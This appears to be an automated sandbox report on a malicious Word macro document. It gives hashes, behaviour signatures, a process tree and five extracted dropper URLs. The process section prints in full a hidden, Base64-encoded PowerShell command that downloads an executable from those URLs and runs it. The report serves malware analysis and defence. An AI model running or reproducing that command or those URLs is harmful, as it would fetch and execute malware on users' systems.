Analysis

  • max time kernel
    70s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2023, 10:29

General

  • Target

    sample.doc

  • Size

    68KB

  • MD5

    b8ec7d16acf6131c28a1f339dab3fee0

  • SHA1

    a6e15e55eeee5e652a11cfbce701e55c0cfddaae

  • SHA256

    188b4e00fb268101935d345bb3a0b55e2141db18a8b438f90d37a7645b48dea3

  • SHA512

    af71825f8c76e1633c8ad1a84fa9925e0ee30923bb848a03f8c9aa44424bb61b09da08bd37a4a23ff2e3abed5d338c8dd0b2a124e59e3436b35449a2001d1083

  • SSDEEP

    1536:ADMemeY5C6OJsdBpZWo2at64mSR6kfxrtl:A4emeY5CTsdAzNSR6kJz

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://folckwanderers.com/wp-includes/t673/

exe.dropper

http://norikkon.com/administrator/020/

exe.dropper

http://compworldinc.com/browse/70676/

exe.dropper

http://freelancedigitales.com/keo/ekb98m90542/

exe.dropper

http://purviitech.com/111/dtl227/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:912
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1340
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -w hidden -en JABKAGIAeABnAGUAbgBiAHIAPQAnAE0AaQBrAHcAcABvAG4AbQBhACcAOwAkAFoAbwBzAHAAcgBnAHQAYgBuAG4AIAA9ACAAJwA2ADQAMwAnADsAJABUAG8AYQB3AGoAcgBuAG0AYwBiAD0AJwBXAGIAYgBsAGEAdQBoAGQAYwB0ACcAOwAkAEcAbgBxAHAAagBtAGcAYwB5AHMAZgBoAGkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAbwBzAHAAcgBnAHQAYgBuAG4AKwAnAC4AZQB4AGUAJwA7ACQARgB2AHIAZQBuAGIAbgBpAHoAeAA9ACcARwBpAGQAawBlAHQAYwBsAHkAJwA7ACQAUABsAGwAdQB6AGcAaABmAHcAegB6AGUAPQAuACgAJwBuAGUAdwAtAG8AYgAnACsAJwBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AdwBFAEIAYwBMAEkAZQBuAHQAOwAkAFoAcABvAGEAeQB0AHYAYgA9ACcAaAB0AHQAcAA6AC8ALwBmAG8AbABjAGsAdwBhAG4AZABlAHIAZQByAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQANgA3ADMALwAqAGgAdAB0AHAAOgAvAC8AbgBvAHIAaQBrAGsAbwBuAC4AYwBvAG0ALwBhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAC8AMAAyADAALwAqAGgAdAB0AHAAOgAvAC8AYwBvAG0AcAB3AG8AcgBsAGQAaQBuAGMALgBjAG8AbQAvAGIAcgBvAHcAcwBlAC8ANwAwADYANwA2AC8AKgBoAHQAdABwADoALwAvAGYAcgBlAGUAbABhAG4AYwBlAGQAaQBnAGkAdABhAGwAZQBzAC4AYwBvAG0ALwBrAGUAbwAvAGUAawBiADkAOABtADkAMAA1ADQAMgAvACoAaAB0AHQAcAA6AC8ALwBwAHUAcgB2AGkAaQB0AGUAYwBoAC4AYwBvAG0ALwAxADEAMQAvAGQAdABsADIAMgA3AC8AJwAuACIAUwBgAFAAbABJAHQAIgAoACcAKgAnACkAOwAkAE4AbgBjAGwAZgBqAHkAagB6AG0AcQByAG8APQAnAFkAYQBuAGIAawB6AHUAcwBlAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEQAcwBuAGYAcgBpAHoAeAB2AHMAZABzAGwAIABpAG4AIAAkAFoAcABvAGEAeQB0AHYAYgApAHsAdAByAHkAewAkAFAAbABsAHUAegBnAGgAZgB3AHoAegBlAC4AIgBEAGAAbwB3AGAATgBsAGAAbwBBAGQARgBJAEwAZQAiACgAJABEAHMAbgBmAHIAaQB6AHgAdgBzAGQAcwBsACwAIAAkAEcAbgBxAHAAagBtAGcAYwB5AHMAZgBoAGkAKQA7ACQAWgBqAHIAcgBrAGYAdgBkAHEAbABxAGgAegA9ACcASAB3AHEAcgBvAGoAdgB1AGIAeAB4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQARwBuAHEAcABqAG0AZwBjAHkAcwBmAGgAaQApAC4AIgBsAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMAMQA3ADcAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAdAAiACgAJABHAG4AcQBwAGoAbQBnAGMAeQBzAGYAaABpACkAOwAkAFUAeAB0AG8AbQB6AGEAaQB1AGYAbAB0AD0AJwBOAGsAZwBjAGoAbQBtAHcAbwBhAGMAbgAnADsAYgByAGUAYQBrADsAJABQAHUAbgBxAHYAagB3AG4AdwBzAG0APQAnAFoAYgBrAGYAdgBtAGQAZwBxAHEAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHgAagBzAGwAegB2AGwAcwBhAHMAPQAnAE4AdgBhAG8AbwBwAGcAeQBuAHYAZAB2AGgAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:864

    Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\469364D6.wmf

            Filesize

            444B

            MD5

            6611772860d8db0ff3b0e481086b1f95

            SHA1

            033fe5b91dc59520ebf179fbe2da4609ef537992

            SHA256

            0bfc3a9890ef42c59b620a2293bc969efd2d5aa99e1a34b5270c3535e052007f

            SHA512

            be782927455a140b360a08edf865f145f55d7e54af2d601e918e2867133db057f1bd590082510642887da6859f0e6bc1d198bcf476093000d0b27a5f05c645f1

          • memory/864-81-0x000000001B390000-0x000000001B672000-memory.dmp

            Filesize

            2.9MB

          • memory/864-82-0x0000000002310000-0x0000000002318000-memory.dmp

            Filesize

            32KB

          • memory/864-83-0x00000000023F0000-0x0000000002470000-memory.dmp

            Filesize

            512KB

          • memory/864-84-0x00000000023F0000-0x0000000002470000-memory.dmp

            Filesize

            512KB

          • memory/864-85-0x00000000023F0000-0x0000000002470000-memory.dmp

            Filesize

            512KB

          • memory/912-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/912-65-0x0000000006530000-0x0000000006630000-memory.dmp

            Filesize

            1024KB

          • memory/912-94-0x0000000006530000-0x0000000006630000-memory.dmp

            Filesize

            1024KB